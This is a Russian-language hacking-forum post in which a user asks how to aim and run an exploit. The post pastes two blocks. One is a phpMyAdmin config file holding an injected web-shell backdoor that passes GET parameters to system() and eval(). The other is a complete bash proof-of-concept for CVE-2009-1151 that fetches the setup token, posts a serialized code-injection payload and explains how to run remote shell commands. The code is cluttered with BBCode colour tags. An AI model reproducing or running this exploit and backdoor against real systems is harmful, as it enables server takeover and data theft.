Форум АНТИЧАТ - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Добрый день. Разъясните пожалуйста по поводу вот этого эксплоита

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $

 * Date: Tue, 09 Jun 2009 14:13:34 GMT

 */

/* Servers configuration */

[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]/* Server  (config:root) [1] */

[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]++;

[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"]]){echo

[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"]]);echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];}if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]]){echo

[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];eval([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]]);echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];};[/COLOR][COLOR="#FF8000"]//'] = 'localhost';

[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'extension'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'mysqli'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'connect_type'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'tcp'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'compress'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'auth_type'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'config'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'root'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]/* End of servers configuration */

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]

Где в данном коде нужно указать ссылку на уязвимый phpmyadmin?

И еще, чем запускать данный эксплоит?

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11

# by pagvac (gnucitizen.org), 4th June 2009.

# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln, 

# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:

# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1

# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:

# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5

# and 3.x before 3.1.3.1 according to PMASA-2009-3

# 2) it *seems* this vuln can only be exploited against environments

# where the administrator has chosen to install phpMyAdmin following

# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx

# 3) administrator must have NOT deleted the '/config/' directory

# within the '/phpMyAdmin/' directory. this is because this directory is

# where '/scripts/setup.php' tries to create 'config.inc.php' which is where

# our evil PHP code is injected 8)

# more info on:

# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php

# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

[/COLOR][COLOR="#007700"]if [[ $[/COLOR][COLOR="#FF8000"]# -ne 1 ]]

[/COLOR][COLOR="#0000BB"]then

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"usage: ./$(basename $0) "

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"

[/COLOR][COLOR="#007700"]exit

[/COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#007700"]if ![/COLOR][COLOR="#0000BB"]which curl[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

then

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"sorry but you need curl for this script to work!"

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"on Debian/Ubuntu: sudo apt-get install curl"

[/COLOR][COLOR="#007700"]exit

[/COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]exploit[/COLOR][COLOR="#007700"]{

[/COLOR][COLOR="#0000BB"]postdata[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"token=$1&action=save&configuration="[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22h  ost%27]="[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22conne  ct_type%22%3bs:3:"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth  _type%22%3bs:6:"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}  }}&eoltype=unix"

[/COLOR][COLOR="#0000BB"]postdata2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"token=$1&action=save&configuration=a:1:"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host  %27%5d="[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cp  re%3e%27%3b"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3be  val"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b  s:6:%22"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%2  2%3bs:8:"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%  22config"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

[/COLOR][COLOR="#0000BB"]flag[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"/tmp/$(basename $0).[/COLOR][COLOR="#0000BB"]$RANDOM[/COLOR][COLOR="#DD0000"].phpinfo.flag.html"

    

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] attempting to inject phpinfo() ..."

[/COLOR][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$postdata[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/scripts/setup.php"[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/config/config.inc.php"[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]grep[/COLOR][COLOR="#DD0000"]"phpinfo()"[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

    then

        curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/config/config.inc.php"[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$flag    

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] success! phpinfo() injected successfully! output saved on[/COLOR][COLOR="#0000BB"]$flag[/COLOR][COLOR="#DD0000"]"

[/COLOR][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]d $postdata2[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/scripts/setup.php"[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"    $3/config/config.inc.php?c=ls+-l+/"

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"    $3/config/config.inc.php?p=phpinfo();"

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"    please send any feedback/improvements for this script to"[/COLOR][COLOR="#007700"]\

[/COLOR][COLOR="#DD0000"]"unknown.pentestergmail.com"

[/COLOR][COLOR="#007700"]else

        echo[/COLOR][COLOR="#DD0000"]"[+] no luck injecting to $3/config/config.inc.php :("

[/COLOR][COLOR="#007700"]exit

[/COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#007700"]}

[/COLOR][COLOR="#FF8000"]# end of exploit function

[/COLOR][COLOR="#0000BB"]cookiejar[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"/tmp/$(basename $0).[/COLOR][COLOR="#0000BB"]$RANDOM[/COLOR][COLOR="#DD0000"].txt"

[/COLOR][COLOR="#0000BB"]token[/COLOR][COLOR="#007700"]=`[/COLOR][COLOR="#DD0000"]curl -ks -c[/COLOR][COLOR="#0000BB"]$cookiejar[/COLOR][COLOR="#DD0000"]--url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12[/COLOR][COLOR="#007700"]`

echo[/COLOR][COLOR="#DD0000"]"[+] checking if phpMyAdmin exists on URL provided ..."

[/COLOR][COLOR="#FF8000"]#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null

[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]grep phpMyAdmin $cookiejar[/COLOR][COLOR="#007700"]&>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

then

    length[/COLOR][COLOR="#007700"]=`[/COLOR][COLOR="#DD0000"]echo -n[/COLOR][COLOR="#0000BB"]$token[/COLOR][COLOR="#DD0000"]| wc -c[/COLOR][COLOR="#007700"]`

[/COLOR][COLOR="#FF8000"]# valid form token obtained?

[/COLOR][COLOR="#007700"]if [[[/COLOR][COLOR="#0000BB"]$length[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]eq 32[/COLOR][COLOR="#007700"]]]

[/COLOR][COLOR="#0000BB"]then

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] phpMyAdmin cookie and form token received successfully. Good!"

[/COLOR][COLOR="#FF8000"]# attempt exploit!

[/COLOR][COLOR="#0000BB"]exploit $token $cookiejar[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]1

[/COLOR][COLOR="#007700"]else

        echo[/COLOR][COLOR="#DD0000"]"[+] could not grab form token. you might want to try exploiting the vuln manually :("

[/COLOR][COLOR="#007700"]exit

[/COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#007700"]else

    echo[/COLOR][COLOR="#DD0000"]"[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"

[/COLOR][COLOR="#007700"]exit

[/COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#FF8000"]# milw0rm.com [2009-06-09][/COLOR][/COLOR]

С нетерпением жду ответа! Спасибо!